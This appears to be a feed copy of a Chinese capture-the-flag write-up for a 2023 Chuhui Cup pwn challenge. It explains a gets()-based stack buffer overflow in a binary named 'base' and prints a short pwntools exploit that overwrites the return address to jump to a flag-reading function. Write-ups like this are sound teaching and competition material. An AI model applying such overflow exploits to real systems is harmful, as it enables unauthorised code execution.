Inf0 - Pwn 2023-12-19T20:22:00+08:00 Typecho https://dirtycow.cn/feed/atom/category/Pwn/ <![CDATA[2023楚慧杯初赛pwn部分WriteUp]]> https://dirtycow.cn/187.html 2023-12-19T20:22:00+08:00 2023-12-19T20:22:00+08:00 Inf0 http://dirtycow.cn base

思路:

checksec查看程序 开了NX保护

image-20231219194716217.png
image-20231219194716217.png

直接脱ida

简单分析一下

image-20231219200214179.png
image-20231219200214179.png

在49行程序gets了用户输入到input

image-20231219200424823.png
image-20231219200424823.png

发现input的大小是0x20

shift+f12查看字符串 发现了flag.txt

image-20231219201516217.png
image-20231219201516217.png

跟进去查看 推测是读取flag的函数 函数的地址是0x40490D

image-20231219201617949.png
image-20231219201617949.png

接下来我们构造payload

因为是64位程序 所以要用8个字节覆盖rbp

payload = b'A'*0x20 + b'B'*8 + p64(0x40490D+1)

exp:

from pwn import *
p = process('./base')
payload = b"A" * 0x20 + b"B" * 8  + p64(0x40490D+1)
p.sendline(b'1')
p.sendline(payload)
p.interactive()

image-20231219202123415.png
image-20231219202123415.png

]]>